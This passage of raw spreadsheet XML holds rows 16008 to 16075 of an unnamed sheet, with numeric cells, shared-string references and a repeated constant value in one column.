      <c r="B16008" s="2">
        <v>4.0134175E7</v>
      </c>
      <c r="C16008" s="2" t="s">
        <v>15453</v>
      </c>
      <c r="D16008" s="2">
        <v>1.0</v>
      </c>
      <c r="E16008" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16008" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16009" ht="15.75" customHeight="1">
      <c r="A16009" s="1">
        <v>3873.0</v>
      </c>
      <c r="B16009" s="2">
        <v>4.0346083E7</v>
      </c>
      <c r="C16009" s="2" t="s">
        <v>15454</v>
      </c>
      <c r="D16009" s="2">
        <v>1.0</v>
      </c>
      <c r="E16009" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16009" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16010" ht="15.75" customHeight="1">
      <c r="A16010" s="1">
        <v>3876.0</v>
      </c>
      <c r="B16010" s="2">
        <v>4.0346083E7</v>
      </c>
      <c r="C16010" s="2" t="s">
        <v>15454</v>
      </c>
      <c r="D16010" s="2">
        <v>1.0</v>
      </c>
      <c r="E16010" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16010" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16011" ht="15.75" customHeight="1">
      <c r="A16011" s="1">
        <v>3896.0</v>
      </c>
      <c r="B16011" s="2">
        <v>4.0430423E7</v>
      </c>
      <c r="C16011" s="2" t="s">
        <v>15455</v>
      </c>
      <c r="D16011" s="2">
        <v>1.0</v>
      </c>
      <c r="E16011" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16011" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16012" ht="15.75" customHeight="1">
      <c r="A16012" s="1">
        <v>3938.0</v>
      </c>
      <c r="B16012" s="2">
        <v>4.0601185E7</v>
      </c>
      <c r="C16012" s="2" t="s">
        <v>15456</v>
      </c>
      <c r="D16012" s="2">
        <v>1.0</v>
      </c>
      <c r="E16012" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16012" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16013" ht="15.75" customHeight="1">
      <c r="A16013" s="1">
        <v>4203.0</v>
      </c>
      <c r="B16013" s="2">
        <v>4.165194E7</v>
      </c>
      <c r="C16013" s="2" t="s">
        <v>15457</v>
      </c>
      <c r="D16013" s="2">
        <v>1.0</v>
      </c>
      <c r="E16013" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16013" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16014" ht="15.75" customHeight="1">
      <c r="A16014" s="1">
        <v>4227.0</v>
      </c>
      <c r="B16014" s="2">
        <v>4.1748937E7</v>
      </c>
      <c r="C16014" s="2" t="s">
        <v>15458</v>
      </c>
      <c r="D16014" s="2">
        <v>1.0</v>
      </c>
      <c r="E16014" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16014" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16015" ht="15.75" customHeight="1">
      <c r="A16015" s="1">
        <v>4301.0</v>
      </c>
      <c r="B16015" s="2">
        <v>4.1948702E7</v>
      </c>
      <c r="C16015" s="2" t="s">
        <v>15459</v>
      </c>
      <c r="D16015" s="2">
        <v>1.0</v>
      </c>
      <c r="E16015" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16015" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16016" ht="15.75" customHeight="1">
      <c r="A16016" s="1">
        <v>4334.0</v>
      </c>
      <c r="B16016" s="2">
        <v>4.2051888E7</v>
      </c>
      <c r="C16016" s="2" t="s">
        <v>15460</v>
      </c>
      <c r="D16016" s="2">
        <v>1.0</v>
      </c>
      <c r="E16016" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16016" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16017" ht="15.75" customHeight="1">
      <c r="A16017" s="1">
        <v>4412.0</v>
      </c>
      <c r="B16017" s="2">
        <v>4.2281907E7</v>
      </c>
      <c r="C16017" s="2" t="s">
        <v>15461</v>
      </c>
      <c r="D16017" s="2">
        <v>1.0</v>
      </c>
      <c r="E16017" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16017" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16018" ht="15.75" customHeight="1">
      <c r="A16018" s="1">
        <v>4757.0</v>
      </c>
      <c r="B16018" s="2">
        <v>4.3404717E7</v>
      </c>
      <c r="C16018" s="2" t="s">
        <v>15462</v>
      </c>
      <c r="D16018" s="2">
        <v>1.0</v>
      </c>
      <c r="E16018" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16018" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16019" ht="15.75" customHeight="1">
      <c r="A16019" s="1">
        <v>4805.0</v>
      </c>
      <c r="B16019" s="2">
        <v>4.3546715E7</v>
      </c>
      <c r="C16019" s="2" t="s">
        <v>15463</v>
      </c>
      <c r="D16019" s="2">
        <v>1.0</v>
      </c>
      <c r="E16019" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16019" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16020" ht="15.75" customHeight="1">
      <c r="A16020" s="1">
        <v>4899.0</v>
      </c>
      <c r="B16020" s="2">
        <v>4.3900655E7</v>
      </c>
      <c r="C16020" s="2" t="s">
        <v>15464</v>
      </c>
      <c r="D16020" s="2">
        <v>1.0</v>
      </c>
      <c r="E16020" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16020" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16021" ht="15.75" customHeight="1">
      <c r="A16021" s="1">
        <v>5391.0</v>
      </c>
      <c r="B16021" s="2">
        <v>4.5456009E7</v>
      </c>
      <c r="C16021" s="2" t="s">
        <v>15465</v>
      </c>
      <c r="D16021" s="2">
        <v>1.0</v>
      </c>
      <c r="E16021" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16021" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16022" ht="15.75" customHeight="1">
      <c r="A16022" s="1">
        <v>5408.0</v>
      </c>
      <c r="B16022" s="2">
        <v>4.5511406E7</v>
      </c>
      <c r="C16022" s="2" t="s">
        <v>15466</v>
      </c>
      <c r="D16022" s="2">
        <v>1.0</v>
      </c>
      <c r="E16022" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16022" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16023" ht="15.75" customHeight="1">
      <c r="A16023" s="1">
        <v>5661.0</v>
      </c>
      <c r="B16023" s="2">
        <v>4.6312043E7</v>
      </c>
      <c r="C16023" s="2" t="s">
        <v>15467</v>
      </c>
      <c r="D16023" s="2">
        <v>1.0</v>
      </c>
      <c r="E16023" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16023" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16024" ht="15.75" customHeight="1">
      <c r="A16024" s="1">
        <v>6287.0</v>
      </c>
      <c r="B16024" s="2">
        <v>4.8174011E7</v>
      </c>
      <c r="C16024" s="2" t="s">
        <v>15468</v>
      </c>
      <c r="D16024" s="2">
        <v>1.0</v>
      </c>
      <c r="E16024" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16024" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16025" ht="15.75" customHeight="1">
      <c r="A16025" s="1">
        <v>6589.0</v>
      </c>
      <c r="B16025" s="2">
        <v>4.897749E7</v>
      </c>
      <c r="C16025" s="2" t="s">
        <v>15469</v>
      </c>
      <c r="D16025" s="2">
        <v>1.0</v>
      </c>
      <c r="E16025" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16025" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16026" ht="15.75" customHeight="1">
      <c r="A16026" s="1">
        <v>6697.0</v>
      </c>
      <c r="B16026" s="2">
        <v>4.9198623E7</v>
      </c>
      <c r="C16026" s="2" t="s">
        <v>15470</v>
      </c>
      <c r="D16026" s="2">
        <v>1.0</v>
      </c>
      <c r="E16026" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16026" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16027" ht="15.75" customHeight="1">
      <c r="A16027" s="1">
        <v>6787.0</v>
      </c>
      <c r="B16027" s="2">
        <v>4.9500231E7</v>
      </c>
      <c r="C16027" s="2" t="s">
        <v>15471</v>
      </c>
      <c r="D16027" s="2">
        <v>1.0</v>
      </c>
      <c r="E16027" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16027" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16028" ht="15.75" customHeight="1">
      <c r="A16028" s="1">
        <v>6882.0</v>
      </c>
      <c r="B16028" s="2">
        <v>4.9733271E7</v>
      </c>
      <c r="C16028" s="2" t="s">
        <v>15472</v>
      </c>
      <c r="D16028" s="2">
        <v>1.0</v>
      </c>
      <c r="E16028" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16028" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16029" ht="15.75" customHeight="1">
      <c r="A16029" s="1">
        <v>6919.0</v>
      </c>
      <c r="B16029" s="2">
        <v>4.9868632E7</v>
      </c>
      <c r="C16029" s="2" t="s">
        <v>15473</v>
      </c>
      <c r="D16029" s="2">
        <v>1.0</v>
      </c>
      <c r="E16029" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16029" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16030" ht="15.75" customHeight="1">
      <c r="A16030" s="1">
        <v>6975.0</v>
      </c>
      <c r="B16030" s="2">
        <v>5.0019372E7</v>
      </c>
      <c r="C16030" s="2" t="s">
        <v>15474</v>
      </c>
      <c r="D16030" s="2">
        <v>1.0</v>
      </c>
      <c r="E16030" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16030" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16031" ht="15.75" customHeight="1">
      <c r="A16031" s="1">
        <v>7815.0</v>
      </c>
      <c r="B16031" s="2">
        <v>5.2273928E7</v>
      </c>
      <c r="C16031" s="2" t="s">
        <v>15475</v>
      </c>
      <c r="D16031" s="2">
        <v>1.0</v>
      </c>
      <c r="E16031" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16031" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16032" ht="15.75" customHeight="1">
      <c r="A16032" s="1">
        <v>8531.0</v>
      </c>
      <c r="B16032" s="2">
        <v>5.4104697E7</v>
      </c>
      <c r="C16032" s="2" t="s">
        <v>15476</v>
      </c>
      <c r="D16032" s="2">
        <v>1.0</v>
      </c>
      <c r="E16032" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16032" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16033" ht="15.75" customHeight="1">
      <c r="A16033" s="1">
        <v>8550.0</v>
      </c>
      <c r="B16033" s="2">
        <v>5.4147878E7</v>
      </c>
      <c r="C16033" s="2" t="s">
        <v>15477</v>
      </c>
      <c r="D16033" s="2">
        <v>1.0</v>
      </c>
      <c r="E16033" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16033" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16034" ht="15.75" customHeight="1">
      <c r="A16034" s="1">
        <v>9022.0</v>
      </c>
      <c r="B16034" s="2">
        <v>5.5012386E7</v>
      </c>
      <c r="C16034" s="2" t="s">
        <v>15478</v>
      </c>
      <c r="D16034" s="2">
        <v>1.0</v>
      </c>
      <c r="E16034" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16034" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16035" ht="15.75" customHeight="1">
      <c r="A16035" s="1">
        <v>9125.0</v>
      </c>
      <c r="B16035" s="2">
        <v>5.5225534E7</v>
      </c>
      <c r="C16035" s="2" t="s">
        <v>15479</v>
      </c>
      <c r="D16035" s="2">
        <v>1.0</v>
      </c>
      <c r="E16035" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16035" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16036" ht="15.75" customHeight="1">
      <c r="A16036" s="1">
        <v>9290.0</v>
      </c>
      <c r="B16036" s="2">
        <v>5.5546294E7</v>
      </c>
      <c r="C16036" s="2" t="s">
        <v>15480</v>
      </c>
      <c r="D16036" s="2">
        <v>1.0</v>
      </c>
      <c r="E16036" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16036" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16037" ht="15.75" customHeight="1">
      <c r="A16037" s="1">
        <v>9344.0</v>
      </c>
      <c r="B16037" s="2">
        <v>5.5655383E7</v>
      </c>
      <c r="C16037" s="2" t="s">
        <v>15481</v>
      </c>
      <c r="D16037" s="2">
        <v>1.0</v>
      </c>
      <c r="E16037" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16037" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16038" ht="15.75" customHeight="1">
      <c r="A16038" s="1">
        <v>9372.0</v>
      </c>
      <c r="B16038" s="2">
        <v>5.569807E7</v>
      </c>
      <c r="C16038" s="2" t="s">
        <v>15482</v>
      </c>
      <c r="D16038" s="2">
        <v>1.0</v>
      </c>
      <c r="E16038" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16038" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16039" ht="15.75" customHeight="1">
      <c r="A16039" s="1">
        <v>9401.0</v>
      </c>
      <c r="B16039" s="2">
        <v>5.576675E7</v>
      </c>
      <c r="C16039" s="2" t="s">
        <v>15483</v>
      </c>
      <c r="D16039" s="2">
        <v>1.0</v>
      </c>
      <c r="E16039" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16039" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16040" ht="15.75" customHeight="1">
      <c r="A16040" s="1">
        <v>9581.0</v>
      </c>
      <c r="B16040" s="2">
        <v>5.6089238E7</v>
      </c>
      <c r="C16040" s="2" t="s">
        <v>15484</v>
      </c>
      <c r="D16040" s="2">
        <v>1.0</v>
      </c>
      <c r="E16040" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16040" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16041" ht="15.75" customHeight="1">
      <c r="A16041" s="1">
        <v>9751.0</v>
      </c>
      <c r="B16041" s="2">
        <v>5.6490156E7</v>
      </c>
      <c r="C16041" s="2" t="s">
        <v>15485</v>
      </c>
      <c r="D16041" s="2">
        <v>1.0</v>
      </c>
      <c r="E16041" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16041" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16042" ht="15.75" customHeight="1">
      <c r="A16042" s="1">
        <v>10259.0</v>
      </c>
      <c r="B16042" s="2">
        <v>5.7568308E7</v>
      </c>
      <c r="C16042" s="2" t="s">
        <v>15486</v>
      </c>
      <c r="D16042" s="2">
        <v>1.0</v>
      </c>
      <c r="E16042" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16042" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16043" ht="15.75" customHeight="1">
      <c r="A16043" s="1">
        <v>10618.0</v>
      </c>
      <c r="B16043" s="2">
        <v>1.3757499E7</v>
      </c>
      <c r="C16043" s="2" t="s">
        <v>15487</v>
      </c>
      <c r="D16043" s="2">
        <v>1.0</v>
      </c>
      <c r="E16043" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16043" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16044" ht="15.75" customHeight="1">
      <c r="A16044" s="1">
        <v>10713.0</v>
      </c>
      <c r="B16044" s="2">
        <v>1.5024544E7</v>
      </c>
      <c r="C16044" s="2" t="s">
        <v>15488</v>
      </c>
      <c r="D16044" s="2">
        <v>1.0</v>
      </c>
      <c r="E16044" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16044" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16045" ht="15.75" customHeight="1">
      <c r="A16045" s="1">
        <v>10731.0</v>
      </c>
      <c r="B16045" s="2">
        <v>1.5256033E7</v>
      </c>
      <c r="C16045" s="2" t="s">
        <v>15489</v>
      </c>
      <c r="D16045" s="2">
        <v>1.0</v>
      </c>
      <c r="E16045" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16045" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16046" ht="15.75" customHeight="1">
      <c r="A16046" s="1">
        <v>10826.0</v>
      </c>
      <c r="B16046" s="2">
        <v>1.5971469E7</v>
      </c>
      <c r="C16046" s="2" t="s">
        <v>15490</v>
      </c>
      <c r="D16046" s="2">
        <v>1.0</v>
      </c>
      <c r="E16046" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16046" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16047" ht="15.75" customHeight="1">
      <c r="A16047" s="1">
        <v>10910.0</v>
      </c>
      <c r="B16047" s="2">
        <v>1.6675889E7</v>
      </c>
      <c r="C16047" s="2" t="s">
        <v>15491</v>
      </c>
      <c r="D16047" s="2">
        <v>1.0</v>
      </c>
      <c r="E16047" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16047" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16048" ht="15.75" customHeight="1">
      <c r="A16048" s="1">
        <v>11218.0</v>
      </c>
      <c r="B16048" s="2">
        <v>2.0253401E7</v>
      </c>
      <c r="C16048" s="2" t="s">
        <v>15492</v>
      </c>
      <c r="D16048" s="2">
        <v>1.0</v>
      </c>
      <c r="E16048" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16048" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16049" ht="15.75" customHeight="1">
      <c r="A16049" s="1">
        <v>11636.0</v>
      </c>
      <c r="B16049" s="2">
        <v>2.3182793E7</v>
      </c>
      <c r="C16049" s="2" t="s">
        <v>15493</v>
      </c>
      <c r="D16049" s="2">
        <v>1.0</v>
      </c>
      <c r="E16049" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16049" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16050" ht="15.75" customHeight="1">
      <c r="A16050" s="1">
        <v>11647.0</v>
      </c>
      <c r="B16050" s="2">
        <v>2.3223567E7</v>
      </c>
      <c r="C16050" s="2" t="s">
        <v>15494</v>
      </c>
      <c r="D16050" s="2">
        <v>1.0</v>
      </c>
      <c r="E16050" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16050" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16051" ht="15.75" customHeight="1">
      <c r="A16051" s="1">
        <v>12006.0</v>
      </c>
      <c r="B16051" s="2">
        <v>2.5964347E7</v>
      </c>
      <c r="C16051" s="2" t="s">
        <v>15495</v>
      </c>
      <c r="D16051" s="2">
        <v>1.0</v>
      </c>
      <c r="E16051" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16051" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16052" ht="15.75" customHeight="1">
      <c r="A16052" s="1">
        <v>12750.0</v>
      </c>
      <c r="B16052" s="2">
        <v>3.1125862E7</v>
      </c>
      <c r="C16052" s="2" t="s">
        <v>15496</v>
      </c>
      <c r="D16052" s="2">
        <v>1.0</v>
      </c>
      <c r="E16052" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16052" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16053" ht="15.75" customHeight="1">
      <c r="A16053" s="1">
        <v>13012.0</v>
      </c>
      <c r="B16053" s="2">
        <v>3.2894022E7</v>
      </c>
      <c r="C16053" s="2" t="s">
        <v>15497</v>
      </c>
      <c r="D16053" s="2">
        <v>1.0</v>
      </c>
      <c r="E16053" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16053" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16054" ht="15.75" customHeight="1">
      <c r="A16054" s="1">
        <v>13229.0</v>
      </c>
      <c r="B16054" s="2">
        <v>3.4239275E7</v>
      </c>
      <c r="C16054" s="2" t="s">
        <v>15498</v>
      </c>
      <c r="D16054" s="2">
        <v>1.0</v>
      </c>
      <c r="E16054" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16054" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16055" ht="15.75" customHeight="1">
      <c r="A16055" s="1">
        <v>13249.0</v>
      </c>
      <c r="B16055" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C16055" s="2" t="s">
        <v>15499</v>
      </c>
      <c r="D16055" s="2">
        <v>1.0</v>
      </c>
      <c r="E16055" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16055" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16056" ht="15.75" customHeight="1">
      <c r="A16056" s="1">
        <v>13729.0</v>
      </c>
      <c r="B16056" s="2">
        <v>3.6386534E7</v>
      </c>
      <c r="C16056" s="2" t="s">
        <v>15500</v>
      </c>
      <c r="D16056" s="2">
        <v>1.0</v>
      </c>
      <c r="E16056" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16056" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16057" ht="15.75" customHeight="1">
      <c r="A16057" s="1">
        <v>14104.0</v>
      </c>
      <c r="B16057" s="2">
        <v>3.7750307E7</v>
      </c>
      <c r="C16057" s="2" t="s">
        <v>15501</v>
      </c>
      <c r="D16057" s="2">
        <v>1.0</v>
      </c>
      <c r="E16057" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16057" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16058" ht="15.75" customHeight="1">
      <c r="A16058" s="1">
        <v>14161.0</v>
      </c>
      <c r="B16058" s="2">
        <v>3.8017994E7</v>
      </c>
      <c r="C16058" s="2" t="s">
        <v>15502</v>
      </c>
      <c r="D16058" s="2">
        <v>1.0</v>
      </c>
      <c r="E16058" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16058" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16059" ht="15.75" customHeight="1">
      <c r="A16059" s="1">
        <v>14394.0</v>
      </c>
      <c r="B16059" s="2">
        <v>3.9122434E7</v>
      </c>
      <c r="C16059" s="2" t="s">
        <v>15503</v>
      </c>
      <c r="D16059" s="2">
        <v>1.0</v>
      </c>
      <c r="E16059" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16059" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16060" ht="15.75" customHeight="1">
      <c r="A16060" s="1">
        <v>15695.0</v>
      </c>
      <c r="B16060" s="2">
        <v>4.3900767E7</v>
      </c>
      <c r="C16060" s="2" t="s">
        <v>15504</v>
      </c>
      <c r="D16060" s="2">
        <v>1.0</v>
      </c>
      <c r="E16060" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16060" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16061" ht="15.75" customHeight="1">
      <c r="A16061" s="1">
        <v>15900.0</v>
      </c>
      <c r="B16061" s="2">
        <v>4.4580466E7</v>
      </c>
      <c r="C16061" s="2" t="s">
        <v>15505</v>
      </c>
      <c r="D16061" s="2">
        <v>1.0</v>
      </c>
      <c r="E16061" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16061" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16062" ht="15.75" customHeight="1">
      <c r="A16062" s="1">
        <v>16160.0</v>
      </c>
      <c r="B16062" s="2">
        <v>4.5600248E7</v>
      </c>
      <c r="C16062" s="2" t="s">
        <v>15506</v>
      </c>
      <c r="D16062" s="2">
        <v>1.0</v>
      </c>
      <c r="E16062" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16062" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16063" ht="15.75" customHeight="1">
      <c r="A16063" s="1">
        <v>16338.0</v>
      </c>
      <c r="B16063" s="2">
        <v>4.604714E7</v>
      </c>
      <c r="C16063" s="2" t="s">
        <v>15507</v>
      </c>
      <c r="D16063" s="2">
        <v>1.0</v>
      </c>
      <c r="E16063" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16063" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16064" ht="15.75" customHeight="1">
      <c r="A16064" s="1">
        <v>16755.0</v>
      </c>
      <c r="B16064" s="2">
        <v>4.7594751E7</v>
      </c>
      <c r="C16064" s="2" t="s">
        <v>15508</v>
      </c>
      <c r="D16064" s="2">
        <v>1.0</v>
      </c>
      <c r="E16064" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16064" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16065" ht="15.75" customHeight="1">
      <c r="A16065" s="1">
        <v>17126.0</v>
      </c>
      <c r="B16065" s="2">
        <v>4.8815266E7</v>
      </c>
      <c r="C16065" s="2" t="s">
        <v>15509</v>
      </c>
      <c r="D16065" s="2">
        <v>1.0</v>
      </c>
      <c r="E16065" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16065" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16066" ht="15.75" customHeight="1">
      <c r="A16066" s="1">
        <v>17614.0</v>
      </c>
      <c r="B16066" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C16066" s="2" t="s">
        <v>15510</v>
      </c>
      <c r="D16066" s="2">
        <v>1.0</v>
      </c>
      <c r="E16066" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16066" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16067" ht="15.75" customHeight="1">
      <c r="A16067" s="1">
        <v>17625.0</v>
      </c>
      <c r="B16067" s="2">
        <v>5.0380214E7</v>
      </c>
      <c r="C16067" s="2" t="s">
        <v>15511</v>
      </c>
      <c r="D16067" s="2">
        <v>1.0</v>
      </c>
      <c r="E16067" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16067" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16068" ht="15.75" customHeight="1">
      <c r="A16068" s="1">
        <v>18001.0</v>
      </c>
      <c r="B16068" s="2">
        <v>5.1420182E7</v>
      </c>
      <c r="C16068" s="2" t="s">
        <v>15512</v>
      </c>
      <c r="D16068" s="2">
        <v>1.0</v>
      </c>
      <c r="E16068" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16068" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16069" ht="15.75" customHeight="1">
      <c r="A16069" s="1">
        <v>18170.0</v>
      </c>
      <c r="B16069" s="2">
        <v>5.1934114E7</v>
      </c>
      <c r="C16069" s="2" t="s">
        <v>15513</v>
      </c>
      <c r="D16069" s="2">
        <v>1.0</v>
      </c>
      <c r="E16069" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16069" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16070" ht="15.75" customHeight="1">
      <c r="A16070" s="1">
        <v>18355.0</v>
      </c>
      <c r="B16070" s="2">
        <v>5.250005E7</v>
      </c>
      <c r="C16070" s="2" t="s">
        <v>15514</v>
      </c>
      <c r="D16070" s="2">
        <v>1.0</v>
      </c>
      <c r="E16070" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16070" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16071" ht="15.75" customHeight="1">
      <c r="A16071" s="1">
        <v>18399.0</v>
      </c>
      <c r="B16071" s="2">
        <v>5.262274E7</v>
      </c>
      <c r="C16071" s="2" t="s">
        <v>15515</v>
      </c>
      <c r="D16071" s="2">
        <v>1.0</v>
      </c>
      <c r="E16071" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16071" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16072" ht="15.75" customHeight="1">
      <c r="A16072" s="1">
        <v>18598.0</v>
      </c>
      <c r="B16072" s="2">
        <v>5.3259802E7</v>
      </c>
      <c r="C16072" s="2" t="s">
        <v>15516</v>
      </c>
      <c r="D16072" s="2">
        <v>1.0</v>
      </c>
      <c r="E16072" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16072" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16073" ht="15.75" customHeight="1">
      <c r="A16073" s="1">
        <v>18644.0</v>
      </c>
      <c r="B16073" s="2">
        <v>5.3424004E7</v>
      </c>
      <c r="C16073" s="2" t="s">
        <v>15517</v>
      </c>
      <c r="D16073" s="2">
        <v>1.0</v>
      </c>
      <c r="E16073" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16073" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16074" ht="15.75" customHeight="1">
      <c r="A16074" s="1">
        <v>18757.0</v>
      </c>
      <c r="B16074" s="2">
        <v>5.378864E7</v>
      </c>
      <c r="C16074" s="2" t="s">
        <v>15518</v>
      </c>
      <c r="D16074" s="2">
        <v>1.0</v>
      </c>
      <c r="E16074" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16074" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16075" ht="15.75" customHeight="1">
      <c r="A16075" s="1">
        <v>18811.0</v>
      </c>
